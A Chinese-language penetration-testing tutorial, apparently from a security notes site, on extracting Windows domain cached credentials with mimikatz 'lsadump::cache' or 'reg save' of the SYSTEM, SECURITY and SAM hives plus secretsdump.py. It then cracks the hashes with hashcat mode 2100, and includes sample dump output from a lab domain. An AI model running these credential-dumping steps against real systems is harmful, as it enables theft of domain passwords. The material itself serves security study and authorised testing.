# 域缓存凭据爆破

#### 域缓存凭据

在安全配置单元文件中，存储了上次登录计算机时使用的域用户凭据，称为域缓存凭据(DCC)

当未能与域控制器连接或与域控制器连接失效时，计算机任然可以对用户进行身份验证，这些凭据是MSCACHEV2/MSCASH哈希值，不是NTLM hash，不能用于`pass the hash`攻击，但是可以尝试爆破

可以通过`reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount`查看缓存登录会话的次数，默认为10（可以为0-50），当第11个用户登录该系统时，前面的会话将被覆盖

#### 域缓存凭据获取及爆破

**使用mimikatz获取**

需要system权限

```
privilege::debug
lsadump::cache

mimikatz # lsadump::cache
Domain : ICE
SysKey : f18dfacb52083d169d9af9bef2803ebb

Local name : ICE ( S-1-5-21-3415465234-765180626-2808229755 )
Domain name : FBI ( S-1-5-21-124841762-3349575232-3850797422 )
Domain FQDN : fbi.gov

Policy subsystem is : 1.18
LSA Key(s) : 1, default {f2e540bd-5dbc-e9e2-f458-86a771ee56fb}
  [00] {f2e540bd-5dbc-e9e2-f458-86a771ee56fb} 096ada796da65e5dc26c97ed5ef5c2435a96f1f30170f5e8770fc0ca41303245

* Iteration is set to default (10240)

[NL$1 - 2023/4/12 16:39:13]
RID       : 00000a2a (2602)
User      : FBI\test1
MsCacheV2 : 81e72b78c2e11576a9d18e7535c1650e

[NL$2 - 2023/4/6 21:53:28]
RID       : 000001f4 (500)
User      : FBI\Administrator
MsCacheV2 : c9bcdd89254c8aba2528d4f4727bb77b

[NL$3 - 2023/4/12 16:37:14]
RID       : 00000e1e (3614)
User      : FBI\token_test
MsCacheV2 : b8d9eb3fb64ce35960d33216a7c5b1a7
```

**使用reg save保存配置单元文件的副本**

管理员权限即可

```
reg save HKLM\SYSTEM system.bin
reg save HKLM\SECURITY security.bin
reg save HKLM\SAM sam.bin
# 将三个文件保存移到kali

secretsdump.py -system system.bin -security security.bin -sam sam.bin  LOCAL
# 其实只需要system.bin和security.bin即可，但是多一个sam.bin就多了本地用户的hash
```

<div><img src="C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681297909982.png" alt=""> <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FohuzTXzTTru6cTtoLNWY%2F1681297909982.png?alt=media&#x26;token=60b3d3a5-70ac-4ecc-bd90-0876e81212cc" alt=""><figcaption></figcaption></figure></div>

**爆破**

hashcat中Domain Cached Credentials (DCC), MS Cache 对应1100，Domain Cached Credentials 2 (DCC2), MS Cache 2对应2100

如果是mimikatz获取的把拼接为`$DCC2$10240#<username>#<MS Cache 2 hash>`样式，即上图`secretsdump.py`获取的样式

将其保存到hash.txt中使用hashcat爆破

<div><img src="C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681298339349.png" alt=""> <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FfiyJrvf53P2jHW2AxslG%2F1681298339349.png?alt=media&#x26;token=4b04a7bb-d9bc-46aa-88af-3286232ac07a" alt=""><figcaption></figcaption></figure></div>

```
hashcat -m 2100 hash.txt pwd.txt --force   
```

<div><img src="C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1681298721649.png" alt=""> <figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FZvnxaRWeogr9YvS9ZPGG%2F1681298721649.png?alt=media&#x26;token=2fe19a1b-8dc1-4adc-9643-e2392000f036" alt=""><figcaption></figcaption></figure></div>

字典里有就可以爆破成功